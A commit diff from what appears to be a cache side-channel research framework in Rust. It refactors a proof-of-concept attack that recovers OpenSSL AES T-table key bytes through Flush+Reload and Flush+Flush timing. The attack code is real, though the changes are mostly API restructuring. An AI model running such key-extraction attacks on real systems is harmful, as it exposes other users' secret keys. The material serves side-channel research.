update AES for the new side channel API

aes-t-tables/src/lib.rs

@@ -6,7 +6,7 @@ use openssl::aes;
 
 use crate::CacheStatus::Miss;
 use cache_side_channel::table_side_channel::TableCacheSideChannel;
-use cache_side_channel::{restore_affinity, set_affinity, CacheStatus};
+use cache_side_channel::{restore_affinity, set_affinity, CacheStatus, ChannelHandle};
 use memmap2::Mmap;
 use openssl::aes::aes_ige;
 use openssl::symm::Mode;
@@ -54,8 +54,8 @@ const KEY_BYTE_TO_ATTACK: usize = 0;
 /// # Safety
 ///
 /// te need to refer to the correct t tables offset in the openssl library at path.
-pub unsafe fn attack_t_tables_poc(
+pub unsafe fn attack_t_tables_poc<T: ChannelHandle>(
-    side_channel: &mut impl TableCacheSideChannel,
+    side_channel: &mut impl TableCacheSideChannel<T>,
     parameters: AESTTableParams,
     name: &str,
 ) {
@@ -88,7 +88,7 @@ pub unsafe fn attack_t_tables_poc(
 
     addresses.shuffle(&mut thread_rng());
 
-    unsafe { side_channel.calibrate(addresses.clone()).unwrap() };
+    let mut victims_handle = unsafe { side_channel.calibrate(addresses.clone()).unwrap() };
 
     for addr in addresses.iter() {
         let mut timing = HashMap::new();
@@ -98,6 +98,8 @@ pub unsafe fn attack_t_tables_poc(
         timings.insert(*addr, timing);
     }
 
+    let mut victim_handles_ref = victims_handle.iter_mut().collect();
+
     for b in (u8::min_value()..=u8::max_value()).step_by(16) {
         eprintln!("Probing with b = {:x}", b);
         // fixme magic numbers
@@ -113,8 +115,9 @@ pub unsafe fn attack_t_tables_poc(
             aes_ige(&plaintext, &mut result, &key_struct, &mut iv, Mode::Encrypt);
         };
 
-        let r =
+        let r = unsafe {
-            unsafe { side_channel.attack(addresses.iter(), &victim, parameters.num_encryptions) };
+            side_channel.attack(&mut victim_handles_ref, &victim, parameters.num_encryptions)
+        };
         match r {
             Ok(v) => {
                 for table_attack_result in v {

aes-t-tables/src/main.rs

@@ -1,8 +1,9 @@
 #![feature(unsafe_block_in_unsafe_fn)]
 #![deny(unsafe_op_in_unsafe_fn)]
 use aes_t_tables::{attack_t_tables_poc, AESTTableParams};
+use cache_utils::calibration::Threshold;
 use flush_flush::naive::NaiveFlushAndFlush;
-use flush_flush::{FlushAndFlush, SingleFlushAndFlush};
+use flush_flush::{FFPrimitives, FlushAndFlush, SingleFlushAndFlush};
 use flush_reload::naive::*;
 use nix::sched::sched_setaffinity;
 use nix::unistd::Pid;
@@ -29,8 +30,20 @@ fn main() {
 
     let te = TE_CITRON_VERT;
 
-    let mut side_channel_fr = NaiveFlushAndReload::from_threshold(220);
+    let mut side_channel_fr = NaiveFlushAndReload::new(
-    let mut side_channel_naiveff = NaiveFlushAndFlush::from_threshold(202);
+        Threshold {
+            bucket_index: 220,
+            miss_faster_than_hit: false,
+        },
+        NaiveFRPrimitives {},
+    );
+    let mut side_channel_naiveff = NaiveFlushAndFlush::new(
+        Threshold {
+            bucket_index: 202,
+            miss_faster_than_hit: true,
+        },
+        FFPrimitives {},
+    );
 
     for (index, key) in [KEY1, KEY2].iter().enumerate() {
         println!("AES attack with Naive F+R, key {}", index);
@@ -61,8 +74,11 @@ fn main() {
         };
         println!("AES attack with Single F+F, key {}", index);
         {
-            let (mut side_channel_ff, old, core) =
+            let mut side_channel_ff = SingleFlushAndFlush::new(
-                SingleFlushAndFlush::new_any_single_core().unwrap();
+                FlushAndFlush::new_any_single_core(FFPrimitives {})
+                    .unwrap()
+                    .0,
+            );
             unsafe {
                 attack_t_tables_poc(
                     &mut side_channel_ff,

cache_side_channel/src/table_side_channel.rs

@@ -33,10 +33,10 @@ pub trait TableCacheSideChannel<Handle: ChannelHandle>: CoreSpec + Debug {
     /// # Safety
     ///
     /// addresses must contain only valid pointers to read.
-    unsafe fn attack<'a, 'b, 'c>(
+    unsafe fn attack<'a, 'b, 'c, 'd>(
         &'a mut self,
-        addresses: impl Iterator<Item = &'c mut Handle> + Clone,
+        addresses: &'b mut Vec<&'c mut Handle>,
-        victim: &'b dyn Fn(),
+        victim: &'d dyn Fn(),
         num_iteration: u32,
     ) -> Result<Vec<TableAttackResult>, ChannelFatalError>
     where
@@ -52,10 +52,10 @@ impl<T: SingleAddrCacheSideChannel> TableCacheSideChannel<T::Handle> for T {
     }
     //type ChannelFatalError = T::SingleChannelFatalError;
 
-    default unsafe fn attack<'a, 'b, 'c>(
+    default unsafe fn attack<'a, 'b, 'c, 'd>(
         &'a mut self,
-        addresses: impl Iterator<Item = &'c mut T::Handle> + Clone,
+        addresses: &'b mut Vec<&'c mut T::Handle>,
-        victim: &'b dyn Fn(),
+        victim: &'d dyn Fn(),
         num_iteration: u32,
     ) -> Result<Vec<TableAttackResult>, ChannelFatalError>
     where
@@ -143,24 +143,25 @@ impl<T: MultipleAddrCacheSideChannel> TableCacheSideChannel<T::Handle> for T {
     /// # Safety
     ///
     /// addresses must contain only valid pointers to read.
-    unsafe fn attack<'a, 'b, 'c>(
+    unsafe fn attack<'a, 'b, 'c, 'd>(
         &'a mut self,
-        mut addresses: impl Iterator<Item = &'c mut T::Handle> + Clone,
+        mut addresses: &'b mut Vec<&'c mut T::Handle>,
-        victim: &'b dyn Fn(),
+        victim: &'d dyn Fn(),
         num_iteration: u32,
     ) -> Result<Vec<TableAttackResult>, ChannelFatalError>
     where
         T::Handle: 'c,
     {
+        let mut addr_iter = addresses.iter_mut();
         let mut v = Vec::new();
-        while let Some(addr) = addresses.next() {
+        while let Some(addr) = addr_iter.next() {
             let mut batch = Vec::new();
-            batch.push(addr);
+            batch.push(&mut **addr);
             let mut hits: HashMap<*const u8, u32> = HashMap::new();
             let mut misses: HashMap<*const u8, u32> = HashMap::new();
             for i in 1..T::MAX_ADDR {
-                if let Some(addr) = addresses.next() {
+                if let Some(addr) = addr_iter.next() {
-                    batch.push(addr);
+                    batch.push(&mut **addr);
                 } else {
                     break;
                 }